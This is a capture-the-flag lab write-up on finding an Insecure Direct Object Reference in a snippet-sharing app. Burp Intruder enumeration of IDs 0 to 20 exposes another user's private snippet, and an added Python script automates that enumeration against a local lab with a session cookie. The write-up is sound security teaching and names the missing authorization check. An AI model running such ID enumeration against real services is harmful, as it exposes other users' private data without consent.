CopyPasta

Today's lab starts with the hint "IDOR" (Insecure Direct Object Reference), which means we're going to hunt for predictable object IDs. Such IDs are usually numeric, but they can also be alphanumeric. My main strategy is to click around the application while Burp captures the traffic, making sure to hit every visible endpoint. Once I've clicked all my worries away, I'll open up Burp and inspect the traffic.

After registering my usual shadow:shadowforge account and doing some happy clicking, writing and posting in the application, I inspected the traffic. While interacting with the application I had already noticed a numerical ID showing up in the URL when I created a snippet, so my instinct kicked in and I looked for that particular request in Burp.

This request seemed a fine candidate to send to Intruder. I set the payload to numeric values from 0 to 20 and let Intruder do its thing. Several IDs came back with a 200. IDs 2 and 3 were public snippets, which their responses showed with the property "is_public":1, but on ID 4 I saw the opposite ("is_public":0). This was a private snippet, I wasn't its author, and the server returned it anyway: the application never checked whether the logged-in user was allowed to read that ID.

The flag and message properties of that response contained the flag 🇧🇪

Another way, without Intruder, is to simply change the ID in the URL to 4 and load the snippet directly.
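The same enumeration as a script, as an added example that is not part of the original writeup. It assumes a JSON endpoint of the form `BASE_URL/snippets/<id>` returning `id`, `is_public`, `author`, `message` and `flag` fields, and a session cookie copied from Burp; the URL, the field names and the sample responses are all assumptions or constructed for the example. It does what the Intruder run did by hand: iterate IDs 0 to 20, keep the 200s, and report every snippet that is private (`is_public` 0) but not owned by the current user.

```python
"""Enumerate numeric snippet IDs and report IDOR hits.

Added example, not the lab's code. Assumes a JSON endpoint
BASE_URL/snippets/<id> with fields "id", "is_public", "author",
"message" and "flag"; the URL, cookie and field names are assumptions.
"""
import json
import urllib.request
from urllib.error import HTTPError
from typing import Callable, Dict, List, Optional, Tuple

BASE_URL = "http://localhost:8080"      # assumption: the lab's host
SESSION_COOKIE = "session=REPLACE_ME"   # assumption: copy from Burp

Fetcher = Callable[[int], Tuple[int, Optional[dict]]]


def http_fetch(snippet_id: int) -> Tuple[int, Optional[dict]]:
    """Fetch one snippet as the logged-in user; returns (status, parsed JSON or None)."""
    req = urllib.request.Request(
        f"{BASE_URL}/snippets/{snippet_id}",
        headers={"Cookie": SESSION_COOKIE, "Accept": "application/json"},
    )
    try:
        with urllib.request.urlopen(req, timeout=5) as resp:
            return resp.status, json.loads(resp.read().decode())
    except HTTPError as e:
        return e.code, None


def find_idor(fetch: Fetcher, me: str, ids: range) -> List[Dict]:
    """Return every snippet the server served although it is private and not ours.

    Mirrors the Intruder run: iterate the IDs, keep the 200 responses, then
    look at is_public and author. A private snippet (is_public == 0) whose
    author is not the current user should never have been returned, so it is
    an IDOR hit.
    """
    hits = []
    for sid in ids:
        status, body = fetch(sid)
        if status != 200 or not isinstance(body, dict):
            continue
        if body.get("is_public") == 0 and body.get("author") != me:
            hits.append({
                "id": sid,
                "author": body.get("author"),
                "message": body.get("message"),
                "flag": body.get("flag"),
            })
    return hits


# Constructed responses standing in for the lab; this is not captured traffic.
FAKE_RESPONSES = {
    1: (200, {"id": 1, "is_public": 0, "author": "shadow", "message": "my own private note"}),
    2: (200, {"id": 2, "is_public": 1, "author": "alice", "message": "public snippet"}),
    3: (200, {"id": 3, "is_public": 1, "author": "bob", "message": "another public one"}),
    4: (200, {"id": 4, "is_public": 0, "author": "admin",
              "message": "should have stayed private",
              "flag": "FLAG{constructed-example}"}),
}


def fake_fetch(snippet_id: int) -> Tuple[int, Optional[dict]]:
    """Offline stand-in for http_fetch; IDs not in the table answer 404."""
    return FAKE_RESPONSES.get(snippet_id, (404, None))


if __name__ == "__main__":
    for hit in find_idor(fake_fetch, me="shadow", ids=range(0, 21)):
        print(hit)
    # Against the real lab: find_idor(http_fetch, me="shadow", ids=range(0, 21))
```

Against the constructed table the only hit is ID 4, which is exactly the private snippet the Intruder run surfaced. The underlying bug is the missing server-side authorization check: a snippet with `is_public` 0 should only be returned when the requesting session's user is its author, regardless of what ID the client asks for.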
